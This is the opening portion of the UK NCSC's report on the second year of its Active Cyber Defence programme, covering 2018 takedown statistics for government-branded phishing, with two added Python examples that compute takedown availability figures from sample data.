Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence...


Active Cyber Defence - The Second Year

Dr Ian Levy, Technical Director

UK National Cyber Security Centre

Maddy S., Data Campaigns and Mission Analytics, UK National Cyber Security Centre

15th July, 2019


Abstract

The National Cyber Security Centre (NCSC) was set up in 2016 to be the single, authoritative voice for cyber security in the UK. This was part of the wider National Cyber Security Strategy which sought to make government much more interventionist in the protection of the UK as a whole. Part of that interventionist strategy is the Active Cyber Defence (ACD) programme which seeks to reduce the harm from commodity cyber attacks against the UK.

One of the founding principles of the NCSC was making decisions based on evidence and being as transparent as possible in that. This report is the next step in building the evidence base for ACD-like services and presents an honest analysis of the outcomes achieved in the UK.

This report covers a range of work across the following sets of ACD service areas:

• Takedown Service: removing malicious content so it can’t cause harm.

• Mail Check: helping domain owners understand and control abuse of their email domains.

• Domain Discovery: helping system owners understand what internet domains they have registered.

• Web Check: proactively scanning websites for simple vulnerabilities and issues.

• Protective DNS: protecting the public sector at scale from harmful internet stuff.

• Routing and signalling: protecting the protocols that route our traffic around the world.

• Host-based capability: getting a handle on public sector IT.

• Vulnerability Disclosure Platform: making it easy to report vulnerabilities in government services.

• Suspicious email incubator: building a service to help the public report on suspicious stuff and automatically take protective action.

The report also describes our scaling strategies for each of the services we believe could be of wider utility and work we intend to do in the coming year.

Despite the late publication date, this report still only covers the calendar year of 2018. This is to ensure we can compare sensibly the data in the previous report and the data in this one. However, that does mean that there are projects in this report that we’ve already talked about in more detail in public. It’s a bit weird. Sorry.


Acknowledgements

This paper has been much more of a team effort than the previous one, although I do take sole responsibility for all errors, omissions and jokes herein. The delay to the expected publication is also solely my fault.

Thanks to Maddy for doing the vast majority of the hard work on the data and a chunk of the drafting for this report (and thanks to Peter W for letting her have the time to do so).

Thanks to the ACD service teams and researchers for running the services in the first place, but also for supporting our ridiculous requests for data, in particular John H, Sam F, Jamie H, Peter H, Kieran C, David I, Richard E, Richard C, Lawrence I, Jon B and Kate S.

Thanks to the socio-technical security group for keeping me honest about how we present data, in particular Helen L, Rachel P, Katie E and Andrew F. A big thanks to Kate A, my Staff Officer, for keeping everything running.

Many people, internal and external, helped with proofing the report at various stages, and you all have my gratitude, especially Simon B whose amazing command of English and extreme pedantry helps immensely.

Finally, thanks to everyone at the NCSC - you make this, and much more, all possible.

Dr. Ian Levy, 15th July 2019


Contents

1 Introduction . . . 9
1.1 Numbers and effects . . . 10
1.2 Feedback . . . 11

2 Takedowns . . . 12
2.1 Last year in takedown . . . 12
2.2 Government related abuse . . . 12
2.2.1 Phishing . . . 13
2.2.2 Case study: HMRC . . . 16
2.2.3 Government sending malware . . . 16
2.2.4 Malware infrastructure . . . 19
2.2.5 Advance fee fraud . . . 20
2.2.6 Deceptive domains . . . 21
2.3 Malicious hosting in UK IP space . . . 22
2.3.1 UK IP space phishing . . . 22
2.3.2 Web-inject malware in UK IP space . . . 24
2.4 New types of takedown . . . 24
2.4.1 Web shells . . . 24
2.4.2 UK legal system advanced fee fraud . . . 27
2.4.3 Non-consensual Monero mining . . . 27
2.4.4 Shopping site skimmers . . . 28
2.5 Hosters’ takedown records . . . 30
2.6 Deceptive domains . . . 31
2.7 SSL certificates . . . 32
2.8 Conclusion . . . 33

3 Mail Check . . . 34
3.1 DMARC and Microsoft . . . 34
3.2 Last year in Mail Check . . . 34
3.3 On email providers . . . 35
3.4 Why we stopped collecting forensic reports . . . 35
3.5 Abuse of public sector email domains . . . 36
3.5.1 Spooftastic data . . . 36
3.5.2 Case study: Campaign using real domain . . . 36
3.6 Synthetic DMARC . . . 36
3.6.1 Case study: Spoofing the aviation sector . . . 37
3.6.2 Case study: Merger of two public bodies . . . 38
3.6.3 Investigating failing mail . . . 39
3.6.4 Spoofing from non-UK IP addresses . . . 40
3.6.5 Synthetic DMARC not universal . . . 40
3.7 The journey to reject . . . 41
3.8 Is there a link between DMARC and phishing? . . . 42
3.9 Other research . . . 42
3.10 Conclusion . . . 44

4 Domain Discovery . . . 47


5 Web Check . . . 48
5.1 Last year in Web Check . . . 48
5.2 What does Web Check look for? . . . 48
5.3 Getting issues fixed . . . 51
5.3.1 Time to fix . . . 51
5.3.2 How bad is it all? . . . 51
5.4 Case study: X.509 certificates . . . 52
5.5 Third party resources . . . 52
5.6 Case study: Symantec certificates . . . 54
5.7 Conclusion . . . 54

6 Protective DNS . . . 56
6.1 DNS and numbers . . . 56
6.2 Last year in protective DNS . . . 56
6.3 Infrastructure . . . 58
6.4 Feeds . . . 60
6.5 Customer case studies . . . 61
6.5.1 Remediating a worm at a local authority . . . 61
6.5.2 USB infection . . . 62
6.5.3 Multiple internet connections . . . 63
6.6 IPv6 . . . 64
6.7 Automated sharing . . . 64
6.8 Unintended benefits . . . 64
6.9 Conclusion . . . 65

7 Routing and signalling . . . 66
7.1 BGP . . . 66
7.2 Source address spoofing . . . 66
7.3 BGP monitoring . . . 66
7.4 SS7 . . . 67
7.5 SMS . . . 68

8 Host-based capability . . . 69

9 Vulnerability Disclosure Platform . . . 70

10 Suspicious Email Incubator . . . 71

11 Scaling . . . 73
11.1 Takedowns . . . 73
11.2 DMARC . . . 74
11.3 Web Check . . . 75
11.4 DNS . . . 75
11.4.1 Academia . . . 75
11.4.2 Health . . . 75
11.4.3 The public . . . 76
11.5 The UK ISPs . . . 76
11.6 The UK Registry . . . 77
11.6.1 Domain Health . . . 77
11.6.2 Domain Watch . . . 77


11.6.3 Tackling criminal activity . . . 78
11.7 Critical National Infrastructure . . . 78

12 Future work . . . 79
12.1 Exercise in a Box . . . 79
12.2 Logging Made Easy . . . 79
12.3 Internet Weather Centre . . . 80
12.4 Infrastructure Check . . . 81
12.5 Supplier Check . . . 81

13 Conclusion . . . 83

List of Figures

1 Volume of HMG-related phishing URLs removed . . . 13
2 Comparison of availability of HMG-related phishing sites between baseline and 2018 (500 bins, xmax = 500, 24 hours noted by vertical line) . . . 14
3 HMRC-related takedowns and share of global phishing . . . 17
4 HMRC rank as a global phishing target (higher is better) . . . 18
5 Mail servers abusing the HMG brand . . . 19
6 Groups of malware infrastructure taken down . . . 20
7 Advance Fee Fraud related email account takedowns . . . 21
8 The number of attack groups hosted in UK IP space and taken down in 2017 and 2018 . . . 22
9 The number of attacks per group hosted in UK IP space in 2017 and 2018 . . . 23
10 The number of attacks per group worldwide . . . 24
11 Percentage of phishing hosted in UK delegated IP space . . . 25
12 Number of web-injects notified in the UK . . . 26
13 Web shells taken down in 2018 . . . 26
14 UK legal system related advance fee fraud attacks taken down . . . 28
15 Non-consensual Monero mining instances hosted on UK delegated IP . . . 29
16 Number of compromised Magento installations in the UK . . . 30
17 Volume of spoofed email using one particular public sector domain . . . 37
18 Volume of synthetic DMARC reports received . . . 38
19 Volume of email blocked by synthetic DMARC records . . . 39
20 Volume of emails related to aviation related campaign . . . 40
21 Histogram of time for domains to get to p = reject (bin width = 7 days, xmax = 550) . . . 42
22 Relationship between DMARC adoption and phishing attacks for public sector . . . 43
23 t-SNE visualisation of clustering of high volume IP address features . . . 45
24 Histogram of time to fix urgent and advisory issues (250 bins, xmax = 365) . . . 51
25 Number of issues fixed in 2018, grouped by severity . . . 52
26 Number of X.509-related advisories issued in 2018 . . . 53
27 Number of affected certificates . . . 55
28 Peak queries per second in 2018 . . . 57
29 Number of unique blocks . . . 59
30 Number of unique blocks, normalised by number of active organisations . . . 59
31 Remediation of a Ramnit infection . . . 61
32 Traffic from a USB-installed malware infection . . . 62
33 Number of blocks relating to unauthorised software . . . 63


List of Tables

1 Statistics of availability of HMG-related phishing sites, before and after intervention . . . 14
2 Comparison of availability of top 10 HMG-related phishing hosters . . . 15
3 Top 10 phishing takedowns in 2017 . . . 15
4 Top 10 phishing takedowns in 2018 . . . 16
5 Most abused brands for advance fee fraud . . . 21
6 Statistics for baseline, 2017 and 2018 availability of phishing sites in UK IP space . . . 23
7 Statistics for baseline, 2017 and 2018 availability of web-inject sites in UK IP space . . . 25
8 Hosters failing takedowns . . . 31
9 Top 10 certificate issuers for HMG-related phishing attacks . . . 32
10 Top 10 certificate issuers for UK hosted phishing attacks . . . 32
11 Volume of synthetic DMARC reports . . . 38
12 Top five DMARC reporters in January 2019 . . . 41
13 Top five Synthetic DMARC reporters in January 2019 . . . 41
14 Distribution of IP addresses sending email and their disposition . . . 44
15 Web Check comparison in numbers - 2017 and 2018 . . . 48
16 Web Check advisories - 2017 and 2018 . . . 50
17 Scale of third party resources used in Web Check-scanned sites . . . 53
18 Comparison of unique blocks for the last two months of 2017 and 2018 . . . 58
19 Number of customers and unique blocks by the DNS service over 2018 . . . 58
20 Effect of each threat feed in December 2018 . . . 60
21 Comparison of volume of IPv4 and IPv6 requests . . . 64


1 Introduction

The UK continues to be one of the most digital economies in the world, with ever more of our lives being online. As this digitalisation continues, the potential real world impact on real people of cyber crime and cyber attack increases. As more of our lives are lived online, more of our lives can be affected by online harms.

The government’s National Cyber Security Strategy from 2015 seeks to address the cyber security related harms in an interventionist manner to actively reduce the online harm to UK citizens and businesses. Part of that strategy is the NCSC’s Active Cyber Defence (ACD) programme. After the first full year of operation of the programme, we published¹ the ‘ACD One Year On’ report, detailing the things we had done and the effects they had achieved. This report covers the second year of the ACD programme and again seeks to show the effects the things we’ve built have had. We do not repeat what was described in the previous report where mechanisms are identical, but we do repeat data where year-on-year comparisons are helpful.

The ACD Programme intends to ‘Protect the majority of people in the UK from the majority of the harm caused by the majority of the cyber attacks the majority of the time.’ The ACD programme is about commodity attacks; other NCSC work seeks to disrupt targeted attacks from very sophisticated actors. Obviously, we neither seek nor claim to thwart every possible attack against the UK. In broad terms, we intend to raise the cost and risk of mounting commodity cyber attacks against the UK, thereby reducing the return on investment for the criminals. As we described last year, cyber crime really does run on a return on investment model and if we can affect that, we can demotivate attackers from targeting the UK. ACD services are relatively simple, but run at large scale. This seems to have the right sort of effect, as we shall try to demonstrate in this paper.

The services we introduced last year have all evolved and continue to provide real benefit to the UK, as we will show. We’ve also introduced some new services, although each of them is at a relatively early stage and so any conclusions drawn from them will be inherently tentative. We’ve also worked hard to ensure that the services we have created are usable by doing some proper, evidence-based user research and testing. Perhaps the rest of the cyber security community could think about doing the same to make cyber security services more accessible to all.

The aim of this paper is to provide an evidence base to help judge the effectiveness of the ACD measures and to do so in a transparent way, as per the NCSC’s stated aims. Despite having more data than last year, to quote last year’s paper, there is still ‘plenty of weird in the data’. Sometimes there are artefacts that we cannot reasonably determine a cause for. Sometimes we are not confident enough to draw a conclusion, even though there appears to be an obvious correlation.

Of course, correlation does not imply causation. We may present two features that we believe to be related, alongside our rationale for believing it, but we will always be upfront about the limitations of our analysis, and indeed of ACD itself. ACD is great at picking off the most common (and often most damaging) cyber vulnerabilities and attacks, but it does not aim to fix everything wrong with cyber security.

Finally, improving the cyber security of the UK is far from a solo effort. ACD is but one function of the NCSC. The NCSC is but one organisation trying to reduce the harm from cyber attack in the UK, alongside other government departments, charities, companies and individuals. We’d be remiss if we didn’t thank all of our partners for their work in protecting the UK.

¹ https://www.ncsc.gov.uk/blog-post/active-cyber-defence-one-year


1.1 Numbers and effects

What does ‘good’ look like for ACD? The ultimate goal, really, is for there to be fewer cyber attacks in the world, and more specifically, less harm from cyber attack globally. One step down from that is that there should be fewer cyber attacks targeting UK citizens, brands, businesses and government, and that the UK should become a hostile space for attackers to host their attacks.

What should the data look like for a successful ACD service? How can we know we’re having the right effect?

Consider the following services:

• Web Check helps make websites a less attractive target, by finding obvious security issues and pointing them out to the website’s owner so they can fix them.

• Mail Check helps public sector organisations take control of their email, making phishing attacks which spoof those organisations more difficult.

• Protective DNS blocks public sector organisations from accessing known malicious domains.

• The Takedown Service finds malicious sites (either attacks or attack-supporting infrastructure) and sends notifications to the hoster or owner to get them removed from the internet.

These services all have similar characteristics: looking for something that causes harm and intervening to reduce that harm, either by blocking access or removing the underlying artefact. You can probably make a case for both upward and downward trendlines of activity being positive:

• Upward trendline - we’re taking down/blocking more attacks, making attackers more frustrated and less likely to target us. We’re doing our job!

• Downward trendline - we’re making it harder to do bad things so there are fewer attacks to take down. We’re doing our job!

If we assume that ACD services are intervening in places where a market failure has engendered a particular problem, we’d expect the early stages of a service to find a lot of examples of that problem. For example, when someone initially signs up to Web Check, we’re not expecting them to have a perfect website, we’re expecting to find issues. We’re not expecting someone joining Mail Check to have perfectly protected their email domains and we are expecting criminals to be abusing those unprotected domains. When we start blocking a particular malicious URL with Protective DNS, we expect to see lots of public sector entities attempt connections to that resource, followed by a marked drop off as the campaign winds down. This is similar for the Takedown Service.

So in general, for services of this character, we could expect to see a hump of bad, with that tailing off relatively quickly, followed by quite a lot of ‘good’ (i.e. absence of that bad). But things are never that simple. Turns out there are lots of horrible, intricate questions that we’re starting to tackle, mostly centred around the question: ‘But what do the humps and numbers mean?’ Using Takedown as an example:

• When takedown numbers start going up: ‘Are we taking down more attacks because we’re getting better at finding them, or are we taking down more attacks because there are more overall?’


• When takedown numbers start going down: ‘Are we taking down fewer attacks because attackers are getting dissuaded, or is our way of detecting these attacks becoming less effective?’

Again, it’s not that simple. The trendlines seem to look more like a hump. When you take into account the initial setup, tuning and then adversary response this kind-of makes sense. However, how do we account for new versions of an existing attack? Can we identify what point of an ‘attack lifecycle’ they’re at (pre-hump, mid-hump...)? Do all types of attack have the same shape hump, or are there different shape humps for different types of attack? We don’t answer all those questions for all services in this paper. As per last year, we welcome help. If you’ve got something to add to this debate, please do get in touch, using the details in section 1.2.

There’s also the potential unintended consequence of driving attackers to a place we can’t see them, or mitigate their impact in an automated manner. We have certainly seen adversary behaviour change correlated with ACD service scaling. In some cases, it’s obviously causal. In other places, it’s more difficult to make a causal link. However, in all cases of adversary behaviour change, they’ve moved in a way that we’ve been able to adapt to. That may not always be the case, obviously.

We’ve been asked if we’re causing the unintended consequence of raising attackers’ skill levels. While that’s certainly going to happen, we’re also likely to see a form of ‘cyber-Darwinism’² take hold. One of the pernicious characteristics of cyber attack is that it’s easy to enable others with less skill to purport attacks. That’s different to the real world. If you put up a burglar alarm, CCTV, a good lock and so on, burglars will be discouraged from trying to get into your house. If lots of people do this in your neighbourhood, it will become less attractive for burglars to wander your local streets. Figuring out a way to neutralise your alarm, break your lock and cover your cameras is simply not worth their time or effort, or the risk it comes with. It is incredibly unlikely that they’ll suddenly become ‘super-burglars’ and go all Ocean’s 11 on you. They’re much more likely to go a few streets away. And if you do have a Hollywood-type master criminal, he or she robbing a house with awesome security doesn’t enable all the local, low level burglars to do the same.

In tackling the commodity, common attacks that take little skill and scale well in terms of harm, we’re trying to make the UK a more difficult target. The data in this paper appears to show that we’re having a decent impact. Remember, this report covers the calendar year 2018, despite being published quite late.

1.2 Feedback

We genuinely do welcome feedback on this paper and the ACD programme in general. If you want to offer research help, a different interpretation of the data, complementary data or just have a good old rant at us, please do get in touch either directly via email to [email protected] or on our social media channels. We received a lot of contact last year and tried to reply to everyone individually (except the really ranty aluminium millinophiles³). We’ll do so again this year, so please be patient if you do get in touch.

² This is intended to suggest that the Darwinian imperative will apply and the less skilled attackers will become less likely to succeed and so become less of a problem.

³ Oh come on. Tin foil hat wearers.


2 Takedowns

The year covered by this report, 2018, is the second full year that Netcraft has run a takedown service on behalf of the NCSC. For full details of the original services, see last year’s ACD report. At a high level, we look for various bad artefacts on the internet and have them removed at source so they can’t cause further harm. This is done through noting to the various entities that host this stuff that the artefact (be it a phishing site, malware distribution URL, mailbox to receive personal data from an advanced fee fraud attack or whatever) is contrary to their own terms and conditions and asking, very nicely, if they wouldn’t mind awfully removing it. We do not serve legal papers on the hosters; there’s a timescale mismatch there.

As per last year, our statistics use grouped attacks as a measure, except where specifically stated. Similar individual attacks are grouped together so we can understand the number of ‘campaigns’. This is useful as it allows us to see, roughly, the number of attack campaigns, rather than one very determined attacker dominating the statistics with a massive campaign. It also keeps the numbers more reasonable so that the numbers out of context don’t imply a level of harm that’s not warranted.

2.1 Last year in takedown

In 2018, we continued the services from 2017 in an identical manner to ensure that we can perform a comparative analysis. We also added a few new services, which we detail later. These are removal of web shells in the UK, notification of non-consensual Monero mining on UK sites, managing advance fee fraud using the UK legal system as a lure, and compromise of UK based Magento shopping carts with credit card skimming code.

In 2017, we performed a total of 219,992 takedowns and in 2018 the number of takedowns was 192,256. Interestingly, in 2017, these were distributed across 72,975 unique IP addresses and linked to 99,543 campaigns. In 2018, only 24,320 unique IP addresses hosted things we were interested in and there were only 51,569 campaigns. In general, across 2018, the median availability of things we sent takedowns for was 9 hours, 64% of them were down in 24 hours and 99.3% eventually went down⁴.

While there is a small reduction in the number of overall takedowns, there is a significant reduction in the number of related campaigns and the IP addresses hosting the malicious content. This suggests that criminals are using less infrastructure and hosting more individual attacks on each instance as part of a campaign. This could suggest that it is becoming harder to host attacks that we are interested in. There could be other explanations due to causes hidden from us, but we are unaware of any other systemic work that could obviously cause that sort of effect. This does suggest that we are achieving our overall goal of making the UK (and UK-related brands) unattractive for cyber crime.
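The grouped-attack measure from the start of this section and the availability statistics above (unique hosting IPs, campaigns, median availability, share down within 24 hours, share eventually down), as an added worked example; this is not code from the report or from the takedown service. The grouping rule (impersonated brand plus hosting IP), the field names and the six sample records are assumptions made here for illustration, since the report does not state how it groups attacks; the example also shows how to treat sites still up at the end of the measurement window, which footnote 4 flags as a source of the missing 0.7%.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from statistics import median
from typing import Optional


@dataclass(frozen=True)
class Takedown:
    """One takedown notification and its outcome (hypothetical record layout)."""
    url: str
    brand: str                   # impersonated brand
    host_ip: str                 # IP address hosting the content
    reported: datetime           # when the takedown notice was sent
    removed: Optional[datetime]  # None = still up at the end of the window


def campaign_key(t: Takedown) -> tuple:
    # Assumed grouping rule: same impersonated brand on the same host
    # counts as one campaign. The report does not specify its own rule.
    return (t.brand, t.host_ip)


def availability_hours(t: Takedown, window_end: datetime) -> float:
    # Censored records (still up) are counted as available until the window
    # closes, so their value is a lower bound rather than a final figure.
    end = t.removed if t.removed is not None else window_end
    return (end - t.reported) / timedelta(hours=1)


def summarise(records, window_end: datetime,
              threshold: timedelta = timedelta(hours=24)) -> dict:
    """Campaign count, unique hosting IPs and takedown-time statistics."""
    if not records:
        raise ValueError("no takedown records")
    n = len(records)
    hours = [availability_hours(t, window_end) for t in records]
    eventually = sum(1 for t in records if t.removed is not None)
    within = sum(1 for t in records
                 if t.removed is not None and t.removed - t.reported <= threshold)
    return {
        "takedowns": n,
        "campaigns": len({campaign_key(t) for t in records}),
        "unique_ips": len({t.host_ip for t in records}),
        "median_hours": median(hours),       # includes censored lower bounds
        "down_within_24h": within / n,
        "eventually_down": eventually / n,
        "still_up": n - eventually,          # censored at window_end
    }


# Constructed sample: six notices sent in 2018, measured up to the end of the
# year. IPs are from documentation ranges; "dept-b" is a made-up brand.
WINDOW_END = datetime(2019, 1, 1)
SAMPLE = [
    Takedown("http://a.example/login", "HMRC", "203.0.113.5",
             datetime(2018, 3, 1, 9), datetime(2018, 3, 1, 12)),      # 3 h
    Takedown("http://b.example/refund", "HMRC", "203.0.113.5",
             datetime(2018, 3, 1, 10), datetime(2018, 3, 1, 19)),     # 9 h
    Takedown("http://c.example/claim", "HMRC", "203.0.113.5",
             datetime(2018, 3, 2, 8), datetime(2018, 3, 4, 8)),       # 48 h
    Takedown("http://d.example/pay", "dept-b", "198.51.100.7",
             datetime(2018, 6, 10, 0), datetime(2018, 6, 10, 6)),     # 6 h
    Takedown("http://e.example/renew", "dept-b", "198.51.100.9",
             datetime(2018, 6, 11, 0), datetime(2018, 6, 13, 12)),    # 60 h
    Takedown("http://f.example/tax", "HMRC", "198.51.100.9",
             datetime(2018, 12, 30, 12), None),                       # still up
]

if __name__ == "__main__":
    for key, value in summarise(SAMPLE, WINDOW_END).items():
        print(f"{key}: {value}")
```

Six notices collapse to four campaigns on three hosts; the record still up at year end is reported separately rather than silently dropped, which is what keeps the "eventually down" figure honest.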

2.2 Government related abuse

We take a very broad view of the ‘HMG brand’ that we protect, partly because we’re trying to reduce harm and partly to help us understand how attackers develop their methodologies in response to our mitigations. Some of the entities we are concerned with might not be identified immediately as government, for example well known universities or the BBC. Each of these is a well-known brand, is likely to be thought of as trustworthy and, as such, could be a popular target for attackers. Attackers spoofing these brands are aiming to add a layer of perceived legitimacy to their attack, and so increase their chances of success.

[4] The majority of the ones that weren’t down at the end of 2018 were reported in the last few days of the year and went down soon into 2019.

2.2.1 Phishing

One of the ways we protect the HMG brand is by taking down phishing URLs that impersonate government-related entities. We talked in detail in our previous report about how these attacks work, and what we’re doing to remove them.

In 2018, we removed 14,124 HMG-related phishing sites, distributed as per figure 1. For comparison, last year we reported that we had removed 18,067 HMG-related phishing sites and in the six months prior to that 19,443 sites. That seems to be a good downward trend.

Figure 1: Volume of HMG-related phishing URLs removed. (Chart not reproduced: x axis Month (2018), Jan to Dec; y axis Number of Takedowns, 0 to 2,000.)

Table 1 shows the summary statistics for the availability of grouped HMG-related phishing attacks for 2018, with the statistics for 2017 and our baseline before intervention for comparison. Figure 2 also shows the histogram of takedown times for the baseline and 2018. While the statistics for this year are still much better than the baseline, they are slightly worse than last year.

This is an odd effect to see given the smaller number of attacks we have seen in 2018 compared to 2017. The one thing that we have no control over is the hosting provider used by the phishers. In 2017, we saw 587 different hosting companies used and this dropped to 451 in 2018. The vast majority of hosting companies are used for one or two attacks and so their responsiveness is unlikely to massively skew our statistics. Table 2 shows the top 10 companies used to host HMG-related phishing attacks in 2017 and 2018, along with the median availability in hours of the attacks they host.

In 2017, the top 10 hosters accounted for 36.5% of all HMG-related phishing while in 2018 they accounted for 48.3%. The weighted average availability in 2017 across the top 10 hosters was 11.8 hours, while in 2018 it was 32.0 hours. That’s significantly worse. By inspection, we can see that both GoDaddy and OVH were significantly slower in removing malicious content in 2018 than they were in 2017, and they accounted for significantly more of the HMG-related phishing hosting. New entrants Shinjiru Technology, Webafrica and DigitalOcean all also had very long availability times, indicating they are not responsive to takedown requests.

Measure                 | Baseline Value | 2017 Value | 2018 Value
Mean (hours)            | 281.1          | 104.8      | 197.3
Median (hours)          | 42.6           | 10.0       | 12.7
Skewness                | 3.2            | 7.2        | 5.8
25th percentile (hours) | 6.4            | 1.7        | 1.4
75th percentile (hours) | 250.8          | 42.9       | 78.0
Sites down in 4 hours   | 21.4%          | 39.5%      | 37.0%
Sites down in 24 hours  | 39.0%          | 65.8%      | 60.0%

Table 1: Statistics of availability of HMG-related phishing sites, before and after intervention

(a) Histogram of baseline availability for HMG-related phishing. (Chart not reproduced: x axis Attack availability (hours), 0 to 800; y axis Number of Takedowns; series Baseline.)

(b) Histogram of availability in 2018 for HMG-related phishing. (Chart not reproduced: x axis Attack availability (hours), 0 to 800; y axis Number of Takedowns; series 2018.)

Figure 2: Comparison of availability of HMG-related phishing sites between baseline and 2018. (500 bins, xmax = 500, 24 hours noted by vertical line)
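How the figures in Table 1 and the share-weighted hoster availability in Table 2 are arrived at, as an added example in Python that is not the NCSC’s or Netcraft’s own code. It assumes availability is the time from a grouped attack first being seen to its takedown; the hoster rows are transcribed from Table 2, and the takedown events are constructed sample data rather than report data.

```python
"""Added example (not NCSC/Netcraft code): the availability summary of
Table 1 and the share-weighted average availability of the top-10 hosters
in Table 2. Hoster rows are from Table 2; the events are constructed."""
from datetime import datetime
from statistics import mean, median

# (hoster, share of HMG-related phishing in %, median availability in hours)
TOP10_2017 = [
    ("Endurance International Group", 9.3, 2.3),
    ("GoDaddy", 6.9, 32.4),
    ("Amazon", 4.3, 9.0),
    ("OVH", 3.7, 11.0),
    ("United Internet", 3.3, 13.0),
    ("Hetzner Online", 2.1, 5.0),
    ("Dynamic Network Services", 1.9, 0.9),
    ("Host Europe Group", 1.8, 9.5),
    ("CloudFlare", 1.6, 22.1),
    ("LiquidWeb", 1.6, 0.3),
]
TOP10_2018 = [
    ("GoDaddy", 17.3, 53.0),
    ("Endurance International Group", 10.5, 2.1),
    ("OVH", 4.1, 25.9),
    ("Amazon", 3.4, 9.2),
    ("Cloudflare", 3.2, 5.5),
    ("Shinjiru Technology", 2.9, 68.5),
    ("Webafrica", 2.7, 50.7),
    ("United Internet", 1.5, 17.8),
    ("DigitalOcean", 1.4, 48.9),
    ("Velocity Servers Network Exchange", 1.3, 14.8),
]

def top10_share(hosters):
    """Total share of attacks hosted by the listed hosters (36.5% / 48.3%)."""
    return sum(share for _, share, _ in hosters)

def weighted_availability(hosters):
    """Share-weighted mean of the hosters' median availability: a slow
    hoster drags the figure up only in proportion to how much it hosts."""
    total = sum(share * hours for _, share, hours in hosters)
    return total / top10_share(hosters)

def availability_hours(events):
    """Hours each grouped attack stayed up, from (first_seen, taken_down)
    ISO-8601 pairs. Groups still up at the cut-off (taken_down is None) are
    left out; the report counts those separately as not yet down."""
    hours = []
    for first_seen, taken_down in events:
        if taken_down is None:
            continue
        delta = datetime.fromisoformat(taken_down) - datetime.fromisoformat(first_seen)
        hours.append(delta.total_seconds() / 3600)
    return hours

def percentile(sorted_vals, p):
    """Linearly interpolated p-th percentile of an already sorted list."""
    k = (len(sorted_vals) - 1) * p / 100
    lo = int(k)
    hi = min(lo + 1, len(sorted_vals) - 1)
    return sorted_vals[lo] + (sorted_vals[hi] - sorted_vals[lo]) * (k - lo)

def skewness(vals):
    """Population skewness. A large positive value is the signature of the
    long tail: most sites go down quickly, a few stay up for weeks."""
    n, m = len(vals), mean(vals)
    m2 = sum((v - m) ** 2 for v in vals) / n
    m3 = sum((v - m) ** 3 for v in vals) / n
    return m3 / m2 ** 1.5 if m2 else 0.0

def summarise(hours):
    """The row set of Table 1 (and Tables 6 and 7) for one year's takedowns."""
    s = sorted(hours)
    n = len(s)
    return {
        "mean_hours": round(mean(s), 1),
        "median_hours": round(median(s), 1),
        "skewness": round(skewness(s), 1),
        "p25_hours": round(percentile(s, 25), 1),
        "p75_hours": round(percentile(s, 75), 1),
        "down_in_4h_pct": round(100 * sum(v <= 4 for v in s) / n, 1),
        "down_in_24h_pct": round(100 * sum(v <= 24 for v in s) / n, 1),
    }

# Constructed sample: seven grouped attacks plus one still up at the cut-off.
SAMPLE_EVENTS = [
    ("2018-03-01T08:00", "2018-03-01T09:30"),  # 1.5 h
    ("2018-03-01T10:00", "2018-03-01T13:00"),  # 3 h
    ("2018-03-02T00:00", "2018-03-02T09:00"),  # 9 h
    ("2018-03-02T12:00", "2018-03-03T00:00"),  # 12 h
    ("2018-03-03T00:00", "2018-03-04T00:00"),  # 24 h
    ("2018-03-04T00:00", "2018-03-05T12:00"),  # 36 h
    ("2018-03-05T00:00", "2018-03-15T00:00"),  # 240 h, the long tail
    ("2018-03-20T00:00", None),                # not yet down, excluded
]

if __name__ == "__main__":
    for year, rows in (("2017", TOP10_2017), ("2018", TOP10_2018)):
        print(year, f"share={top10_share(rows):.1f}%",
              f"weighted availability={weighted_availability(rows):.1f}h")
    print(summarise(availability_hours(SAMPLE_EVENTS)))
```

The weighted averages come out at the 11.8 and 32.0 hours quoted above, and the sample summary shows why the report prints skewness alongside the median: one 240-hour group moves the mean to 46.5 hours while the median stays at 12.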

Most of these providers are very large with a high share of websites worldwide. The fact they host a high share of phishing websites is therefore not surprising. It’s interesting to look at some of the biggest providers and their responsiveness to takedowns and the hosters who are bad at even actioning takedown requests, detailed in section 2.5. It would be interesting to look at the commonality in business models, over and above that they all offer a free service of some sort, that allow for such prevalence - and sometimes bad takedown performance - to occur. Something like this may make a nice academic study [5]. We are in discussions with GoDaddy to help optimise the interaction between our takedown processes, with GoDaddy saying “We appreciate the opportunity to work with the NCSC on the important topic of phishing prevention. We take these issues very seriously and are constantly looking for ways to improve how we handle these reports.” It’s great to see a company taking responsibility and we hope the data next year shows the fruits of their labours.

[5] Hint, hint.

2017                                                        | 2018
Hoster                        | Share (%) | Availability (hours) | Hoster                            | Share (%) | Availability (hours)
Endurance International Group | 9.3       | 2.3                  | GoDaddy                           | 17.3      | 53.0
GoDaddy                       | 6.9       | 32.4                 | Endurance International Group     | 10.5      | 2.1
Amazon                        | 4.3       | 9.0                  | OVH                               | 4.1       | 25.9
OVH                           | 3.7       | 11.0                 | Amazon                            | 3.4       | 9.2
United Internet               | 3.3       | 13.0                 | Cloudflare                        | 3.2       | 5.5
Hetzner Online                | 2.1       | 5.0                  | Shinjiru Technology               | 2.9       | 68.5
Dynamic Network Services      | 1.9       | 0.9                  | Webafrica                         | 2.7       | 50.7
Host Europe Group             | 1.8       | 9.5                  | United Internet                   | 1.5       | 17.8
CloudFlare                    | 1.6       | 22.1                 | DigitalOcean                      | 1.4       | 48.9
LiquidWeb                     | 1.6       | 0.3                  | Velocity Servers Network Exchange | 1.3       | 14.8

Table 2: Comparison of availability of top 10 HMG-related phishing hosters

Table 3 and Table 4 show the top ten brands we removed attacks against in 2017 and 2018.

Brand                            | No. of Attacks | No. of Attack Groups | Median Availability (hours)
HMRC                             | 16,064         | 2,466                | 10
gov.uk                           | 1,541          | 241                  | 15
TV Licensing                     | 172            | 93                   | 5
DVLA                             | 107            | 53                   | 11
Government Gateway               | 46             | 22                   | 6
Crown Prosecution Service        | 43             | 26                   | 15
University                       | 23             | 9                    | 0.7
Student Loans Company            | 19             | 11                   | 17
Student Finance Direct           | 13             | 3                    | 3
British Broadcasting Corporation | 8              | 7                    | 35

Table 3: Top 10 phishing takedowns in 2017

The top 5 phished brands have remained the same between 2017 and 2018, but they’ve changed in order. HMRC, however, has remained at the top but there has been a very significant improvement in the number of attacks we see. The university-related phishing attacks all appear to be harvesting credentials for university webmail services and have increased significantly over the year. We don’t know how the criminals are going to monetise those credentials, but it’s possibly linked to the Student Loans Company-related attacks. Perhaps access to the relevant university mail account is needed as part of some process that helps the criminal, for example password change before bank account change. We will do some work on this.


Brand                            | No. of Attacks | No. of Attack Groups | Median Availability (hours)
